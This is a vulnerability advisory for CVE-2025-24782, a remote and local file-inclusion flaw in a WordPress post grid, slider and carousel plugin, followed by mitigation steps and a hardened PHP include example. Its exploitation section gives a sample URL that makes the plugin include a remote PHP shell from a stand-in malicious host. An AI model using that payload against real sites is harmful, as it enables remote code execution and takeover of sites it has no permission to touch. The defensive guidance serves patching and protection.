How the CVE Works:
CVE-2025-24782 is a critical vulnerability in the wpWax Post Grid, Slider & Carousel Ultimate plugin for WordPress, affecting versions up to 1.6.10. The flaw arises from improper control of filenames in PHP’s `include` or `require` statements, leading to Local File Inclusion (LFI) or Remote File Inclusion (RFI). Attackers can exploit this by manipulating input parameters to include malicious files from remote servers or local directories. This allows them to execute arbitrary PHP code, potentially gaining full control over the affected WordPress site. The vulnerability is particularly dangerous because it does not require authentication, making it easily exploitable.
DailyCVE Form:
Platform: WordPress
Version: 1.6.10 and earlier
Vulnerability: Remote File Inclusion
Severity: Critical
Date: 01/27/2025
What Undercode Say:
Exploitation:
1. Exploit Code Example:
http://vulnerable-site.com/wp-content/plugins/post-grid-slider-carousel-ultimate/includes/file.php?file=http://malicious-site.com/shell.txt
This URL forces the plugin to include a remote PHP shell, enabling code execution.
2. Manual Testing:
Use tools like Burp Suite or curl to manipulate the `file` parameter and test for LFI/RFI vulnerabilities.
3. Automated Exploitation:
Use Metasploit or custom scripts to automate the exploitation process.
Protection:
1. Patch:
Update the wpWax Post Grid, Slider & Carousel Ultimate plugin to the latest version immediately.
2. Server Configuration:
- Disable `allow_url_include` in php.ini: `allow_url_include = Off`
- Restrict file permissions (directories need the execute bit, so use 755 for directories and 644 for files; `chmod 644` on the plugin directory itself would make it unreadable to PHP):
find wp-content/plugins/post-grid-slider-carousel-ultimate/ -type d -exec chmod 755 {} \;
find wp-content/plugins/post-grid-slider-carousel-ultimate/ -type f -exec chmod 644 {} \;
3. Web Application Firewall (WAF):
Implement a WAF to block malicious requests targeting file inclusion vulnerabilities.
4. Code Review:
Audit plugin code for insecure use of `include` or `require` statements.
5. Monitoring:
Use tools like OSSEC or Fail2Ban to monitor and block suspicious activity.
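The code-review item above is easiest to act on with a concrete pattern for the weakness the advisory describes (a request parameter flowing into `include`). The following PHP is an added example written for this page, not code from the wpWax plugin or from the advisory; the `templates/` directory, the template names and the function names are assumptions, and only the `file` parameter name comes from the page.

```php
<?php
// Added example for this advisory, not code from the wpWax plugin.
// Assumptions: templates live under <plugin dir>/templates/, the request
// parameter is named `file` (as in the advisory), and the slug list is constructed.

// The pattern behind this class of bug: the filename comes straight from the
// request, so a URL (RFI, when allow_url_include is On) or a path outside the
// plugin directory (LFI, regardless of that setting) is honoured as-is.
//     include $_GET['file'];   // vulnerable form, shown for contrast only

// Hardened form: strict slug syntax, an allowlist, and realpath() confinement.
function pgsc_resolve_template(string $requested): ?string
{
    $allowed = ['grid', 'slider', 'carousel'];   // constructed allowlist

    // Plain slugs only: slashes, dots, NUL bytes and URL schemes cannot pass this.
    if (!preg_match('/^[a-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    $base = realpath(__DIR__ . '/templates');
    if ($base === false) {
        return null;   // template directory missing or unreadable
    }
    // realpath() returns false for missing files and resolves symlinks, so the
    // prefix test also stops a link inside templates/ from pointing outside it.
    $path = realpath($base . '/' . $requested . '.php');
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function pgsc_include_template(string $requested): void
{
    $path = pgsc_resolve_template($requested);
    if ($path === null) {
        http_response_code(400);   // inside WordPress, wp_die() is the usual choice
        exit('invalid template');
    }
    include $path;   // only an allowlisted file under templates/ reaches this line
}

pgsc_include_template((string) ($_GET['file'] ?? ''));
```

Note that disabling `allow_url_include` only removes the remote variant; the allowlist and path confinement are what stop local inclusion.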
Commands:
- Check PHP configuration:
php -i | grep allow_url_include
- Scan for vulnerable plugins:
wpscan --url http://vulnerable-site.com --enumerate vp
Analytics:
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network
- Exploitability: High
- Impact: Confidentiality, Integrity, Availability
By following these steps, you can mitigate the risk posed by CVE-2025-24782 and secure your WordPress installation.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-24782
Extra Source Hub:
Undercode